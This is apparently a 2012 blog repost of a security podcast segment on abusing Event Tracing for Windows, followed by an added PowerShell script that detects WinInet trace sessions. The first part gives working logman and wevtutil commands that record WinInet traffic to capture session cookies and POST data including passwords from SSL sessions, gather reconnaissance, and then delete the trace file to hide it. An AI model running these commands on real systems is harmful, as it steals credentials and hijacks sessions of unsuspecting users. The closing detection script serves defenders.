Sep 17, 2012

Data Mining Event Tracing for Windows

>>>> From http://pauldotcom.com/wiki/index.php/Episode300

This is to show how to tap into the data logged by Windows Communication Foundation (WCF) and fed to Event Tracing for Windows (ETW).

The ETW provider logs excessive amounts of information that may give an attacker access to sensitive data. By tapping into these otherwise silent logging mechanisms an attacker can find all kinds of useful information.

Below is an example to show "Sidejacking SSL Cookies". You can steal the cookies within the encrypted SSL session.

First, turn on the Event Tracing for WinInet.

c:\>cd \temp
c:\temp>logman start CookieStealer -p Microsoft-Windows-WinInet -o cookiesteal.etl -ets


From now on, all the WinInet connections and SSL sessions are logged.

To check the cookies:
c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "cookie added"

To check the POST info (including password):
c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "POST"

To check some additional reconnaissance:

c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "hostname"
c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "WPAD"
c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "DNS Cache"

To turn off your Event logging:

c:\temp>logman stop CookieStealer -ets

And remember to remove your "cookiesteal.etl" file.
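The defensive flip side of the segment above: starting a trace session with logman -ets needs administrator rights, and the session stays visible to anyone who asks the system for its active ETW sessions. The PowerShell script below is an added example (mine, not from the PaulDotCom episode) that lists the running trace sessions with "logman query -ets", then inspects each one and flags any subscribed to the Microsoft-Windows-WinInet provider, reporting the .etl file it writes to. The provider name is the one used on the page; the provider GUID is an assumption and should be confirmed locally with "logman query providers Microsoft-Windows-WinInet".

```powershell
# Added example, not part of the original segment: find running ETW trace
# sessions that capture WinInet activity (cookies, POST bodies, hostnames).
# Run from an elevated PowerShell prompt; logman needs admin rights for -ets.

$providerName = 'Microsoft-Windows-WinInet'
# Assumed GUID for the provider above; verify with:
#   logman query providers Microsoft-Windows-WinInet
$providerGuid = '43D1A55C-76D6-4F7E-995C-64C711E5CAFE'

function Get-EtwSessionNames {
    # 'logman query -ets' prints a header line, a dashed separator, then one
    # session per line: <name>  <type>  <status>. Names may contain spaces,
    # so anchor on the two-or-more spaces that precede the "Trace" type column.
    $lines = & logman query -ets 2>$null
    $names = @()
    $inTable = $false
    foreach ($line in $lines) {
        if ($line -match '^-{5,}') { $inTable = $true; continue }
        if (-not $inTable) { continue }
        if ($line.Trim() -eq '' -or $line -match '^The command completed') { break }
        if ($line -match '^(.*?)\s{2,}Trace\s') { $names += $matches[1].Trim() }
    }
    return $names
}

function Get-EtwSessionDetail([string]$sessionName) {
    # Per-session detail includes the output file and the enabled providers.
    return (& logman query $sessionName -ets 2>$null | Out-String)
}

function Test-SessionUsesWinInet([string]$detail) {
    # -match is case-insensitive; check both the friendly name and the GUID,
    # since logman may print either depending on how the session was created.
    return ($detail -match [regex]::Escape($providerName)) -or ($detail -match $providerGuid)
}

$findings = @()
foreach ($name in Get-EtwSessionNames) {
    $detail = Get-EtwSessionDetail $name
    if (Test-SessionUsesWinInet $detail) {
        # "Output Location:" names the .etl file; real-time-only sessions have none.
        $outFile = if ($detail -match 'Output Location:\s*(.+)') { $matches[1].Trim() } else { '(none / real-time)' }
        $findings += [pscustomobject]@{ Session = $name; OutputFile = $outFile }
    }
}

if ($findings.Count -eq 0) {
    Write-Output "No running ETW session subscribes to $providerName."
} else {
    Write-Warning "ETW sessions capturing WinInet activity were found:"
    $findings | Format-Table -AutoSize
}
```

Running this while the CookieStealer session from the walkthrough is active should list that session together with c:\temp\cookiesteal.etl as its output location; once "logman stop CookieStealer -ets" has run, the session disappears from the list, which is why the .etl file on disk (and who created it) is the second thing to check.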